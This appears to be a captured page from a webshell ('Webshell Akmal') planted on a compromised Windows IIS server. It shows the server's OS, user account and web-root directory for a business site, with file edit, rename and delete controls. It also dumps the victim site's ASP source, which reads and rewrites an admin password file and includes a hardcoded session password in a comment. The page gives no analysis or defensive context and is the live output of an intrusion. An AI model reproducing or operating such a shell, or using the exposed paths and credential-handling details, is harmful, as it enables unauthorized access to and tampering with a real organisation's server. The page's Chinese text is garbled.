Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>������</title> <style type="text/css"> <!-- .STYLE2 { font-size: 12px; color: #FF0000; } .STYLE3 {color: #FF0000} .STYLE5 {color: #0080FF} --> </style> <script language="JavaScript" type="text/javascript"> function uppic() { TT1=document.change.TT1.value; if(TT1!="") { TT2=document.change.TT2.value; var re1=/(?=.*\d)(?=.*[a-zA-Z])(?=.*[\W_])^.{13,}$/; if (!re1.test(TT2)) { alert("�����������������֣�Ӣ����ĸ,�����ַ����ҳ��ȳ���13λ"); document.change.TT2.focus(); return false; } if(TT2!=TT3) { alert("���������������벻����"); document.change.TT3.focus(); return false; } } TT4=document.change.TT4.value; if(TT4!="") { TT5=document.change.TT5.value; var re1=/(?=.*\d)(?=.*[a-zA-Z])(?=.*[\W_])^.{13,}$/; if (!re1.test(TT5)) { alert("��ɼ��������������֣�Ӣ����ĸ,�����ַ����ҳ��ȳ���13λ"); document.change.TT5.focus(); return false; } if(TT5!=TT6) { alert("��ɼ������������벻����"); document.change.TT5.focus(); return false; } } return true; } function CheckAll(form) { for (var i=0;i<form.elements.length;i++) { var e = form.elements[i]; if (e.name != 'chkall') e.checked = form.chkall.checked; } } </script> </script> </head> <body style="width:1200px; margin:0 auto; text-align:center"> <% set fs=Server.CreateObject("Scripting.FileSystemObject") 'if session("asc365allpassword")<>"8879365" then response.end Dim oldpass(100,10) o_i=0 Temp=server.MapPath("../../../ASC365_CWZ/Web/Webadmin/PW_Admin_Inf") set f=fs.OpenTextFile(Temp,1) do while f.AtEndOfStream=false str=f.ReadLine if left(str,2)<>"//" then str11=split(str,"|") for j=0 to 7 oldpass(o_i,j)=str11(j) next o_i=o_i+1 end if loop f.close set f=nothing Dim passDetail(18) p_i=1 dd=0 tt=0 if request.Form("submit")="submit" then for i=1 to 18 passDetail(i)=trim(request.Form("TT"&i)) next if passDetail(1)<>"" then tt=tt+1 if passDetail(4)<>"" then tt=tt+1 bianma=request.Form("bianma") for i=0 to o_i-1 if bianma=oldpass(i,0) then if oldpass(i,3)=passDetail(1) and passDetail(1)<>"" then oldpass(i,3)=passDetail(2) oldpass(i,6) = now() dd=dd+1 end if if oldpass(i,4)=passDetail(4) and passDetail(4)<>"" then oldpass(i,4)=passDetail(5) oldpass(i,7) = now() dd=dd+1 end if end if next if dd=tt and dd>0 then Temp=server.MapPath("../../../ASC365_CWZ/Web/Webadmin/PW_Admin_Inf") set f=fs.OpenTextFile(Temp,2) for i=0 to o_i-1 ww="" for j=0 to 7 ww=ww&oldpass(i,j)&"|" next f.WriteLine(ww) next f.close set f=nothing end if end if %> <form id=change name=change method="post" action="" onsubmit="return uppic()"> <table width="1200" style="text-align:left; margin-top:50px" cellpadding="0" border="1" cellspacing="0"> <tr> <th align="center" height="40" colspan="3">����������</th> </tr> <tr> <td align="center" height="40" colspan="3"><span class="STYLE5">��ע�⣬��̨���벻�������˱��롣����������֣��ַ��������ַ������ܰ������ַ���"|","#"�������볤��Ҫ����13λ������Ӧ��̨�����룬������ԭʼ���롣</span></td> </tr> <tr> <td width="382" height="40"><div align="right">���˱��룺</div></td> <td colspan="2"><input type="text" name="bianma" value="<%=bianma%>" size="6"> <span class="STYLE3"><strong> *</strong></span></td> </tr> <tr> <td width="382" height="40"><div align="right">����̨���룺</div></td> <td width="285"><input type="text" name="TT1" id="TT1" value="<%=passDetail(1)%>" /> <span class="STYLE2">������</span></td> <td width="525"><input type="password" name="TT2" value="<%=passDetail(2)%>" /> <input type="password" name="TT3" value="<%=passDetail(3)%>" /> <span class="STYLE2">�����룬��������</span></td> </tr> <tr> <td height="40"><div align="right">�����ˣ�</div></td> <td><input type="text" name="TT4" value="<%=passDetail(4)%>" /></td> <td><input type="password" name="TT5" value="<%=passDetail(5)%>" /> <input type="password" name="TT6" value="<%=passDetail(6)%>" /></td> </tr> <tr> <th align="center" height="40" colspan="3"><input type="submit" name="submit" value="submit" /></th> </tr> <% if dd=tt and dd>0 then %> <tr> <th align="center" height="40" colspan="3"><span class="STYLE3">�����ijɹ�����</span></th> </tr> <% elseif dd<tt and dd>0 then %> <tr> <th align="center" height="40" colspan="3"><span class="STYLE3">�������������������������</span></th> </tr> <% end if %> </table> </form> </body> </html>